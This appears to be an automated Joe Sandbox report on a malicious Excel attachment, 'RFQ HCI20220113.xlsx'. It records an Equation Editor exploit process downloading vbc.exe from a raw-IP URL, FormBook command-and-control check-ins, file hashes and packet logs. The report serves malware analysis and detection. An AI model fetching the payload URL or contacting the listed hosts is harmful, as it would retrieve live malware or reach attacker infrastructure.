                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:RFQ HCI20220113.xlsx
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                  Number of analysed new started processes analysed:8
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.expl.evad.winXLSX@7/18@9/8
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 30.5% (good quality ratio 28.1%)
                                                  • Quality average: 67.3%
                                                  • Quality standard deviation: 31.4%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 127
                                                  • Number of non-executed functions: 29
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .xlsx
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
• Not all processes were analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                  Simulations

                                                  Behavior and APIs

Time | Type | Description
20:21:46 | API Interceptor | 62x Sleep call for process: EQNEDT32.EXE modified
20:21:49 | API Interceptor | 76x Sleep call for process: vbc.exe modified
20:22:12 | API Interceptor | 171x Sleep call for process: cmd.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs


                                                  Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
www.ylhwcl.com | Tax payment invoice - Wed, November 10, 2021,pdf.exe | Get hash | malicious | Browse | 122.10.28.11
www.ylhwcl.com | Vergi #U00f6deme faturas#U0131 9 Kas#U0131m 2021 Sal#U0131,pdf.exe | Get hash | malicious | Browse | 122.10.28.11
www.bjbwx114.com | ihJ4eSV1of.exe | Get hash | malicious | Browse | 23.80.120.93
www.norfg.com | ihJ4eSV1of.exe | Get hash | malicious | Browse | 43.134.0.76

                                                  ASN


                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:downloaded
                                                  Size (bytes):417792
                                                  Entropy (8bit):7.729098788142576
                                                  Encrypted:false
                                                  SSDEEP:12288:gyK777777777777OPMfcmnxTLrXEQ0/Ll1PishiMkNMfPjJ8W:jK777777777777OKLQR1Pf+aP6W
                                                  MD5:83AC585E99B527EEB278702F8F711568
                                                  SHA1:A576A927B067C94CDBC1E7B353F60577F5B310F9
                                                  SHA-256:9E2502B3945F31482623E8E61DCB85B9EBB7D9A4244D9074FA289596C9DA513E
                                                  SHA-512:F4A5F197CCA552237CA4CA0DBDBA4AF5E5C0F6BCA7A05313A61D96C5021049EDEB0B38D8E4AD5EE3B062692038F05254787A57C5C1A0E951E9A9B9F091A304AC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                  Reputation:low
                                                  IE Cache URL:http://198.23.213.59/1155/vbc.exe
Preview: raw byte dump omitted
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15A5C04C.emf
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                  Category:dropped
                                                  Size (bytes):1628828
                                                  Entropy (8bit):2.229123093390047
                                                  Encrypted:false
                                                  SSDEEP:3072:UVMqDjXlNqlVkXFL4we9ANp7RySvRaXGcmfBEtAPrcccccsF8WccccccccF9cccC:ULjXlN0k1fKANpFZIiByA764
                                                  MD5:E5B435F23CA21C551E2EB0AD7511289A
                                                  SHA1:139160E066DA9E9E7DBD234C5B554CCEBE307138
                                                  SHA-256:2A64589D13E424512714FD43F0AD13D4870489D7D5DF1CB86A6A6AC84560D3EF
                                                  SHA-512:3E576211D088A0ECDE7D572CFE9684E84154E3191FAFF9A2C42E3E007006FE95FFD87E4EE6781A5DB5C6C394A4D7A2B85F651E9499DBEF019074EFA84972AFED
                                                  Malicious:false
                                                  Reputation:low
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\220FF079.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 135 x 175, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):9240
                                                  Entropy (8bit):7.9386613011729015
                                                  Encrypted:false
                                                  SSDEEP:192:xgohZDgqajF3w9dfa2EbNBdO31HC6xeiPUe8wO4szk6PwFUdSFepGh:CohZgqajWfa2ExbB23U4OkawF8SFegh
                                                  MD5:C19636DBD6A1B9428BCB8758E04F5FC7
                                                  SHA1:BD5F5490EB4FDFB9A8161A6F77B6440520136473
                                                  SHA-256:C7F22E5E13D15601B865F0DE1FDAB380218CE085DAB19B0A2F28ACA4A670A88E
                                                  SHA-512:F63D1E715EEAF2F93338F40DE2EAB6550483F1FAD430ED94AF0649AE7B073E2929796D43800E9CFC086D0F0C2EC18D2A8487B19F9071EECCE3CE777B25600B36
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29ED4C58.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3747
                                                  Entropy (8bit):7.932023348968795
                                                  Encrypted:false
                                                  SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                  MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                  SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                  SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                  SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5DD030D5.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 139 x 180, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3747
                                                  Entropy (8bit):7.932023348968795
                                                  Encrypted:false
                                                  SSDEEP:96:4apPN/1Cb2ItR9rXu7p6mtnOCRxMJZtFtQcgBF5c2SGA:1Pp1kRROtrRxSyRjST1
                                                  MD5:5EB99F38CB355D8DAD5E791E2A0C9922
                                                  SHA1:83E61CDD048381C86E3C3EFD19EB9DAFE743ADBA
                                                  SHA-256:5DAC97FDBD2C2D5DFDD60BF45F498BB6B218D8BFB97D0609738D5E250EBBB7E0
                                                  SHA-512:80F32B5740ECFECC5B084DF2C5134AFA8653D79B91381E62A6F571805A6B44D52D6FD261A61A44C33364123E191D974B87E3FEDC69E7507B9927936B79570C86
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BD458D2.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 135 x 175, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):9240
                                                  Entropy (8bit):7.9386613011729015
                                                  Encrypted:false
                                                  SSDEEP:192:xgohZDgqajF3w9dfa2EbNBdO31HC6xeiPUe8wO4szk6PwFUdSFepGh:CohZgqajWfa2ExbB23U4OkawF8SFegh
                                                  MD5:C19636DBD6A1B9428BCB8758E04F5FC7
                                                  SHA1:BD5F5490EB4FDFB9A8161A6F77B6440520136473
                                                  SHA-256:C7F22E5E13D15601B865F0DE1FDAB380218CE085DAB19B0A2F28ACA4A670A88E
                                                  SHA-512:F63D1E715EEAF2F93338F40DE2EAB6550483F1FAD430ED94AF0649AE7B073E2929796D43800E9CFC086D0F0C2EC18D2A8487B19F9071EECCE3CE777B25600B36
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90706C26.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                  Category:dropped
                                                  Size (bytes):4396
                                                  Entropy (8bit):7.884233298494423
                                                  Encrypted:false
                                                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B082A1EF.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C040A83A.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):11303
                                                  Entropy (8bit):7.909402464702408
                                                  Encrypted:false
                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D37E7324.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB750BDD.jpeg
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x160, frames 3
                                                  Category:dropped
                                                  Size (bytes):4396
                                                  Entropy (8bit):7.884233298494423
                                                  Encrypted:false
                                                  SSDEEP:96:1rQzp0lms5HqrrVflQ9MS5Bmy9CSKgpEfSgHk4oPQwb/BD+qSzAGW:1UF0EmEiSS3mKbbpDSk4oYwbBD+qKAX
                                                  MD5:22FEC44258BA0E3A910FC2A009CEE2AB
                                                  SHA1:BF6749433E0DBCDA3627C342549C8A8AB3BF51EB
                                                  SHA-256:5CD7EA78DE365089DDDF47770CDECF82E1A6195C648F0DB38D5DCAC26B5C4FA5
                                                  SHA-512:8ED1D2EE0C79AFAB19F47EC4DE880C93D5700DB621ACE07D82F32FA3DB37704F31BE2314A7A5B55E4913131BCA85736C9AC3CB5987BEE10F907376D76076E7CA
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3F9A6F3.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Temp\~DF182ACAA3E256FB8B.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Temp\~DF348A23C0846DCD61.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Temp\~DF464E500D1B1A44AE.TMP
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3::
                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                  Malicious:false
                                                   C:\Users\user\AppData\Local\Temp\~DF474EEA2985E340FB.TMP
                                                   Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                   File Type: CDFV2 Encrypted
                                                   Category: dropped
                                                   Size (bytes): 317816
                                                   Entropy (8bit): 7.9785869008250065
                                                   Encrypted: false
                                                   SSDEEP: 6144:Tvu1GedR2fSZ3lWkAfjP7FW+Ij8+BGd/m/SvMeH6x0mdEa1f2K9doyi:j+VjUs4kWP5W+IY+BGd/m/SvMekp5Q
                                                   MD5: DA4BEFA8DFE9D56B937B01A2D2818175
                                                   SHA1: CF8E6AE0B8AFB3D3F2956FBE0C88599FB361EDE8
                                                   SHA-256: 87F4B613C197B92F31D5EED4C7AD32A8BA4AE68313D56B54FF656F273FB56D86
                                                   SHA-512: 421CE4922A5C05C59DC9993AC48DA9D99D990BD9A46587E2BA2116F55889EAD2378239C79154D3EF03178C49F0E6AEE1BC1ECF1E64CDAF450D5D0B2316B6E15D
                                                   Malicious: false
                                                   C:\Users\user\Desktop\~$RFQ HCI20220113.xlsx
                                                   Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                   File Type: data
                                                   Category: dropped
                                                   Size (bytes): 165
                                                   Entropy (8bit): 1.4377382811115937
                                                   Encrypted: false
                                                   SSDEEP: 3:vZ/FFDJw2fV:vBFFGS
                                                   MD5: 797869BB881CFBCDAC2064F92B26E46F
                                                   SHA1: 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                   SHA-256: D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                   SHA-512: 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                   Malicious: true
                                                   Preview: .user ..A.l.b.u.s. (Office owner-lock file; remainder of the preview is padding)
                                                   C:\Users\Public\vbc.exe
                                                   Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                   File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                   Category: dropped
                                                   Size (bytes): 417792
                                                   Entropy (8bit): 7.729098788142576
                                                   Encrypted: false
                                                   SSDEEP: 12288:gyK777777777777OPMfcmnxTLrXEQ0/Ll1PishiMkNMfPjJ8W:jK777777777777OKLQR1Pf+aP6W
                                                   MD5: 83AC585E99B527EEB278702F8F711568
                                                   SHA1: A576A927B067C94CDBC1E7B353F60577F5B310F9
                                                   SHA-256: 9E2502B3945F31482623E8E61DCB85B9EBB7D9A4244D9074FA289596C9DA513E
                                                   SHA-512: F4A5F197CCA552237CA4CA0DBDBA4AF5E5C0F6BCA7A05313A61D96C5021049EDEB0B38D8E4AD5EE3B062692038F05254787A57C5C1A0E951E9A9B9F091A304AC
                                                   Malicious: true
                                                   Antivirus:
                                                   • Antivirus: Avira, Detection: 100%
                                                   • Antivirus: Joe Sandbox ML, Detection: 100%
                                                   • Antivirus: ReversingLabs, Detection: 44%

                                                   Static File Info

                                                   General

                                                   File type: CDFV2 Encrypted
                                                   Entropy (8bit): 7.9785869008250065
                                                   TrID:
                                                   • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                   File name: RFQ HCI20220113.xlsx
                                                   File size: 317816
                                                   MD5: da4befa8dfe9d56b937b01a2d2818175
                                                   SHA1: cf8e6ae0b8afb3d3f2956fbe0c88599fb361ede8
                                                   SHA256: 87f4b613c197b92f31d5eed4c7ad32a8ba4ae68313d56b54ff656f273fb56d86
                                                   SHA512: 421ce4922a5c05c59dc9993ac48da9d99d990bd9a46587e2ba2116f55889ead2378239c79154d3ef03178c49f0e6aee1bc1ecf1e64cdaf450d5d0b2316b6e15d
                                                   SSDEEP: 6144:Tvu1GedR2fSZ3lWkAfjP7FW+Ij8+BGd/m/SvMeH6x0mdEa1f2K9doyi:j+VjUs4kWP5W+IY+BGd/m/SvMekp5Q

                                                   File Icon

                                                   Icon Hash: e4e2aa8aa4b4bcb4

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                   Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP     Dest IP
                                                   01/13/22-20:22:49.687273  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22  103.224.212.220
                                                   01/13/22-20:22:49.687273  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22  103.224.212.220
                                                   01/13/22-20:22:49.687273  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49168        80         192.168.2.22  103.224.212.220
                                                   01/13/22-20:23:00.496770  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22  122.10.28.11
                                                   01/13/22-20:23:00.496770  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22  122.10.28.11
                                                   01/13/22-20:23:00.496770  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49170        80         192.168.2.22  122.10.28.11
                                                   01/13/22-20:23:11.619415  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22  192.185.98.251
                                                   01/13/22-20:23:11.619415  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22  192.185.98.251
                                                   01/13/22-20:23:11.619415  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49172        80         192.168.2.22  192.185.98.251

                                                  Network Port Distribution

                                                  TCP Packets

                                                   Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                  Jan 13, 2022 20:21:56.389624119 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389638901 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389652967 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389662027 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389672995 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389678955 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389683008 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389691114 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389695883 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389714003 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389733076 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389744043 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389754057 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389766932 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389775038 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389796972 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389797926 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389817953 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389828920 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389839888 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.389858007 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.389888048 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.390383959 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.397017002 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.397058964 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.397083044 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.397106886 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.397130966 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.397193909 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.397241116 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.401489973 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.402662992 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.499903917 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.499959946 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.499999046 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500034094 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500037909 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500076056 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500077963 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500085115 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500118017 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500130892 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500159025 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500180006 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500199080 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500206947 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500251055 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500267029 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500288963 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500324965 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500329971 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500355005 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500371933 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500380039 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500408888 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500427961 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500449896 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.500472069 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.500505924 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.503375053 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.503434896 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.503485918 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.503484964 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.503501892 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.503539085 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.503546953 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.503618002 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.503671885 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.503724098 CET8049167198.23.213.59192.168.2.22
                                                  Jan 13, 2022 20:21:56.503739119 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.503763914 CET4916780192.168.2.22198.23.213.59
                                                  Jan 13, 2022 20:21:56.503777981 CET8049167198.23.213.59192.168.2.22
